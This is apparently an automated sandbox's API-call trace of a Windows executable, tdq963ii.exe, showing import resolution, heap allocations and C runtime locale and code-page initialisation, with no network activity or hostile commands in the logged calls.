GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0173.504] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0173.505] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0173.506] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0173.507] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0173.508] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0173.508] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0173.508] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0173.508] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0173.508] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0173.509] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0173.509] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0173.509] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0173.509] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0173.509] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0173.509] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0173.509] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0173.509] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0173.509] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0173.509] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0173.509] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0173.510] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0173.510] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0173.510] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0173.510] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0173.510] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0173.511] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0173.511] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0173.511] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0173.511] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0173.512] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0173.512] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0173.512] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0173.512] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0174.064] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0174.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2154e540, dwHighDateTime=0x1d68287)) [0174.069] GetCurrentThreadId () returned 0x224 [0174.069] GetCurrentProcessId () returned 0xaec [0174.069] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=29440984158) returned 1 [0174.076] GetProcessHeap () returned 0x5b0000 [0174.888] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0174.888] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0174.889] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0174.889] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0174.889] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0174.889] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0174.889] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0174.890] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0174.891] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0174.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0174.893] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0175.676] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3bc) returned 0x5c70c8 [0175.676] GetCurrentThreadId () returned 0x224 [0175.676] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c7490 [0175.676] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c74b0 [0175.677] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xfa53abeb, hStdError=0x0)) [0175.677] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0175.677] GetFileType (hFile=0x3) returned 0x2 [0175.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0175.677] GetFileType (hFile=0x80) returned 0x3 [0175.677] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0175.677] GetFileType (hFile=0xb) returned 0x2 [0175.678] GetCommandLineW () returned="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner" [0175.678] GetEnvironmentStringsW () returned 0x5c7cb8* [0175.678] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb92) returned 0x5c8858 [0175.682] FreeEnvironmentStringsW (penv=0x5c7cb8) returned 1 [0175.682] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0175.682] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c7cb8 [0175.686] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa0) returned 0x5c7d48 [0175.686] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c4df8 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6c) returned 0x5c7df0 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6e) returned 0x5c7e68 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x78) returned 0x5bf928 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5c7ee0 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c7f50 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c7f88 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c7fd8 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5c8018 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5c6a98 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4a) returned 0x5c8048 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x72) returned 0x5bf9a8 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c80a0 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c80d8 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5c6ac0 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd2) returned 0x5c8110 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7c) returned 0x5c81f0 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c8278 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5c4e40 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x90) returned 0x5c82b8 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c8350 [0175.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c8380 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c83b8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c83f8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c8448 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c4e88 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5c84a8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x82) returned 0x5c84c8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c8558 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5c6ae8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5c8590 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c85c8 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c8628 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c8688 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c4ed0 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c86c0 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c8720 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c8750 [0175.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8c) returned 0x5c8788 [0175.690] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8858 | out: hHeap=0x5b0000) returned 1 [0175.714] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c8820 [0175.714] GetLastError () returned 0x0 [0175.714] SetLastError (dwErrCode=0x0) [0175.714] GetLastError () returned 0x0 [0175.714] SetLastError (dwErrCode=0x0) [0175.715] GetLastError () returned 0x0 [0175.715] SetLastError (dwErrCode=0x0) [0175.715] GetACP () returned 0x4e4 [0175.715] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x220) returned 0x5c9028 [0175.715] GetLastError () returned 0x0 [0175.715] SetLastError (dwErrCode=0x0) [0175.715] IsValidCodePage (CodePage=0x4e4) returned 1 [0175.715] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0175.715] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0176.776] GetLastError () returned 0x0 [0176.776] SetLastError (dwErrCode=0x0) [0176.776] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.779] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.779] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0176.779] GetLastError () returned 0x0 [0176.779] SetLastError (dwErrCode=0x0) [0176.779] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.779] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.779] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.779] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0176.779] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 